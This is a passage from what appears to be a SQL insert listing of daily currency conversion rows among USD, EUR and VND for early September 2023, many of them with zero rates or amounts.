(8739, 2, 'EUR', 0.000000, 1, 'USD', 1.086800, '2023-09-01'),
(8740, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8741, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8742, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8743, 1, 'USD', 1.000000, 2, 'EUR', 0.920130, '2023-09-02'),
(8744, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8745, 2, 'EUR', 1.000000, 1, 'USD', 1.086800, '2023-09-02'),
(8746, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8747, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8748, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8749, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-02'),
(8750, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8751, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-02'),
(8752, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8753, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8754, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8755, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-02'),
(8756, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8757, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-02'),
(8758, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8759, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8760, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8761, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-02'),
(8762, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8763, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-02'),
(8764, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8765, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8766, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8767, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-02'),
(8768, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8769, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-02'),
(8770, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8771, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8772, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8773, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-02'),
(8774, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8775, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-02'),
(8776, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8777, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8778, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8779, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-02'),
(8780, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8781, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-02'),
(8782, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8783, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8784, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8785, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-02'),
(8786, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8787, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-02'),
(8788, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-02'),
(8789, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-02'),
(8790, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-02'),
(8791, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8792, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8793, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8794, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8795, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8796, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8797, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8798, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8799, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8800, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8801, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8802, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8803, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8804, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8805, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8806, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8807, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8808, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8809, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8810, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8811, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8812, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8813, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8814, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8815, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8816, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8817, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8818, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8819, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8820, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8821, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8822, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8823, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8824, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8825, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8826, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8827, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8828, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8829, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8830, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8831, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8832, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8833, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-03'),
(8834, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8835, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-03'),
(8836, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-03'),
(8837, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-03'),
(8838, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-03'),
(8839, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8840, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8841, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8842, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8843, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8844, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8845, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8846, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8847, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8848, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8849, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8850, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8851, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8852, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8853, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8854, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8855, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8856, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8857, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8858, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8859, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8860, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8861, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8862, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8863, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8864, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8865, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8866, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8867, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8868, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8869, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8870, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8871, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8872, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8873, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8874, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8875, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8876, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8877, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8878, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8879, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8880, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8881, 1, 'USD', 0.000000, 2, 'EUR', 0.922170, '2023-09-04'),
(8882, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8883, 2, 'EUR', 0.000000, 1, 'USD', 1.084400, '2023-09-04'),
(8884, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-04'),
(8885, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-04'),
(8886, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-04'),
(8887, 1, 'USD', 1.000000, 2, 'EUR', 0.922170, '2023-09-05'),
(8888, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8889, 2, 'EUR', 1.000000, 1, 'USD', 1.084400, '2023-09-05'),
(8890, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8891, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8892, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8893, 1, 'USD', 0.000000, 2, 'EUR', 0.925840, '2023-09-05'),
(8894, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8895, 2, 'EUR', 0.000000, 1, 'USD', 1.080100, '2023-09-05'),
(8896, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8897, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8898, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8899, 1, 'USD', 1.000000, 2, 'EUR', 0.925840, '2023-09-05'),
(8900, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8901, 2, 'EUR', 1.000000, 1, 'USD', 1.080100, '2023-09-05'),
(8902, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8903, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8904, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8905, 1, 'USD', 0.000000, 2, 'EUR', 0.925840, '2023-09-05'),
(8906, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8907, 2, 'EUR', 0.000000, 1, 'USD', 1.080100, '2023-09-05'),
(8908, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8909, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8910, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8911, 1, 'USD', 1.000000, 2, 'EUR', 0.925840, '2023-09-05'),
(8912, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8913, 2, 'EUR', 1.000000, 1, 'USD', 1.080100, '2023-09-05'),
(8914, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8915, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8916, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8917, 1, 'USD', 0.000000, 2, 'EUR', 0.925840, '2023-09-05'),
(8918, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8919, 2, 'EUR', 0.000000, 1, 'USD', 1.080100, '2023-09-05'),
(8920, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8921, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8922, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8923, 1, 'USD', 1.000000, 2, 'EUR', 0.925840, '2023-09-05'),
(8924, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8925, 2, 'EUR', 1.000000, 1, 'USD', 1.080100, '2023-09-05'),
(8926, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8927, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8928, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8929, 1, 'USD', 0.000000, 2, 'EUR', 0.925840, '2023-09-05'),
(8930, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8931, 2, 'EUR', 0.000000, 1, 'USD', 1.080100, '2023-09-05'),
(8932, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-05'),
(8933, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-05'),
(8934, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-05'),
(8935, 1, 'USD', 1.000000, 2, 'EUR', 0.925840, '2023-09-06'),
(8936, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8937, 2, 'EUR', 1.000000, 1, 'USD', 1.080100, '2023-09-06'),
(8938, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8939, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8940, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8941, 1, 'USD', 0.000000, 2, 'EUR', 0.931880, '2023-09-06'),
(8942, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8943, 2, 'EUR', 0.000000, 1, 'USD', 1.073100, '2023-09-06'),
(8944, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8945, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8946, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8947, 1, 'USD', 1.000000, 2, 'EUR', 0.931880, '2023-09-06'),
(8948, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8949, 2, 'EUR', 1.000000, 1, 'USD', 1.073100, '2023-09-06'),
(8950, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8951, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8952, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8953, 1, 'USD', 0.000000, 2, 'EUR', 0.931880, '2023-09-06'),
(8954, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8955, 2, 'EUR', 0.000000, 1, 'USD', 1.073100, '2023-09-06'),
(8956, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8957, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8958, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8959, 1, 'USD', 1.000000, 2, 'EUR', 0.931880, '2023-09-06'),
(8960, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8961, 2, 'EUR', 1.000000, 1, 'USD', 1.073100, '2023-09-06'),
(8962, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8963, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8964, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8965, 1, 'USD', 0.000000, 2, 'EUR', 0.931880, '2023-09-06'),
(8966, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8967, 2, 'EUR', 0.000000, 1, 'USD', 1.073100, '2023-09-06'),
(8968, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8969, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8970, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8971, 1, 'USD', 1.000000, 2, 'EUR', 0.931880, '2023-09-06'),
(8972, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8973, 2, 'EUR', 1.000000, 1, 'USD', 1.073100, '2023-09-06'),
(8974, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8975, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8976, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8977, 1, 'USD', 0.000000, 2, 'EUR', 0.931880, '2023-09-06'),
(8978, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8979, 2, 'EUR', 0.000000, 1, 'USD', 1.073100, '2023-09-06'),
(8980, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-06'),
(8981, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-06'),
(8982, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-06'),
(8983, 1, 'USD', 1.000000, 2, 'EUR', 0.931880, '2023-09-07'),
(8984, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(8985, 2, 'EUR', 1.000000, 1, 'USD', 1.073100, '2023-09-07'),
(8986, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(8987, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-07'),
(8988, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(8989, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-09-07'),
(8990, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(8991, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-09-07'),
(8992, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(8993, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-07'),
(8994, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(8995, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-09-07'),
(8996, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(8997, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-09-07'),
(8998, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(8999, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-07'),
(9000, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(9001, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-09-07'),
(9002, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9003, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-09-07'),
(9004, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9005, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-07'),
(9006, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(9007, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-09-07'),
(9008, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9009, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-09-07'),
(9010, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9011, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-07'),
(9012, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(9013, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-09-07'),
(9014, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9015, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-09-07'),
(9016, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9017, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-07'),
(9018, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(9019, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-09-07'),
(9020, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9021, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-09-07'),
(9022, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9023, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-07'),
(9024, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(9025, 1, 'USD', 0.000000, 2, 'EUR', 0.930670, '2023-09-07'),
(9026, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9027, 2, 'EUR', 0.000000, 1, 'USD', 1.074500, '2023-09-07'),
(9028, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-07'),
(9029, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-07'),
(9030, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-07'),
(9031, 1, 'USD', 1.000000, 2, 'EUR', 0.930670, '2023-09-08'),
(9032, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9033, 2, 'EUR', 1.000000, 1, 'USD', 1.074500, '2023-09-08'),
(9034, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9035, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9036, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9037, 1, 'USD', 0.000000, 2, 'EUR', 0.933710, '2023-09-08'),
(9038, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9039, 2, 'EUR', 0.000000, 1, 'USD', 1.071000, '2023-09-08'),
(9040, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9041, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9042, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9043, 1, 'USD', 1.000000, 2, 'EUR', 0.933710, '2023-09-08'),
(9044, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9045, 2, 'EUR', 1.000000, 1, 'USD', 1.071000, '2023-09-08'),
(9046, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9047, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9048, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9049, 1, 'USD', 0.000000, 2, 'EUR', 0.933710, '2023-09-08'),
(9050, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9051, 2, 'EUR', 0.000000, 1, 'USD', 1.071000, '2023-09-08'),
(9052, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9053, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9054, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9055, 1, 'USD', 1.000000, 2, 'EUR', 0.933710, '2023-09-08'),
(9056, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9057, 2, 'EUR', 1.000000, 1, 'USD', 1.071000, '2023-09-08'),
(9058, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9059, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9060, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9061, 1, 'USD', 0.000000, 2, 'EUR', 0.933710, '2023-09-08'),
(9062, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9063, 2, 'EUR', 0.000000, 1, 'USD', 1.071000, '2023-09-08'),
(9064, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9065, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9066, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9067, 1, 'USD', 1.000000, 2, 'EUR', 0.933710, '2023-09-08'),
(9068, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9069, 2, 'EUR', 1.000000, 1, 'USD', 1.071000, '2023-09-08'),
(9070, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9071, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9072, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9073, 1, 'USD', 0.000000, 2, 'EUR', 0.933710, '2023-09-08'),
(9074, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9075, 2, 'EUR', 0.000000, 1, 'USD', 1.071000, '2023-09-08'),
(9076, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-08'),
(9077, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-08'),
(9078, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-08'),
(9079, 1, 'USD', 1.000000, 2, 'EUR', 0.933710, '2023-09-09'),
(9080, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9081, 2, 'EUR', 1.000000, 1, 'USD', 1.071000, '2023-09-09'),
(9082, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9083, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-09'),
(9084, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-09'),
(9085, 1, 'USD', 0.000000, 2, 'EUR', 0.934230, '2023-09-09'),
(9086, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9087, 2, 'EUR', 0.000000, 1, 'USD', 1.070400, '2023-09-09'),
(9088, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-09'),
(9089, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-09'),
